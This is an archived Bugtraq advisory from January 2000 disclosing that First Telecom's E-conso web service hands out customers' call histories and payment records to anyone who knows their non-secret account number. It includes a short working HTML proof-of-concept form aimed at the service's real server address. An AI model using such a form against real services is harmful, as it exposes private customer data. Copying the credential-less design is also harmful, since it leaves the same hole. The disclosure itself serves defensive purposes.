Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2000-01

Bugtraq Archives: First Telecom E-conso service totally insecure

First Telecom E-conso service totally insecure

Subject: First Telecom E-conso service totally insecure
From: Thomas Quinot (thomasCUIVRE.FR.EU.ORG)
Date: Mon Jan 03 2000 - 17:10:30 CST

Next message: Chuck Lawrence: "Re: HPUX Aserver revisited."
Previous message: Mark A. Heilpern: "Re: Symlinks and Cryogenic Sleep"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

First Telecom, a company that provides a pre-paid calling card service
in France, Germany and the United Kingdom, offers a service
called E-conso which allows subscribers to check the current balance
of their account and peruse the history of all calls they made through
First Telecom.

The WWW form at the home page of the service requires entry of
the account number (which is printed on all First Telecom documents
and embossed on the plastic membership card sent to every subscriber),
as well as a password chosen by the customer during the sign-up
procedure.

The submission of this form returns a page which includes the customer's
name and address, and a form (with a /fixed/ "action" URL) which
contains the customer's account number as a "hidden" field.
Submission of this form returns the details of payements or
the call history, depending on which button is clicked by the customer.

No hidden field and no cookie is used to pass any client credentials
back to the server. Which means it is trivial to retrieve the details
of past payements as well as the call history of a First Telecom
customer knowing only her (non-secret) account number.

The HTML code included demonstrates this important flaw.

Thomas.

---------- cut here : first.html

<html>

<head>
<title>First Telecom e-conso exploit</title>
</head>

<body>
<form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton" method="POST">
<p>
Account number: <input type="text" name="cmaster" value="0000000">
<input type="submit" name="cmdcdr" value="Details of calls">
<input type="submit" name="cmdpaymenthistory" value="Details of payements">

</body>
</html>

Next message: Chuck Lawrence: "Re: HPUX Aserver revisited."
Previous message: Mark A. Heilpern: "Re: Symlinks and Cryogenic Sleep"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b27 : Tue Jan 04 2000 - 13:31:20 CST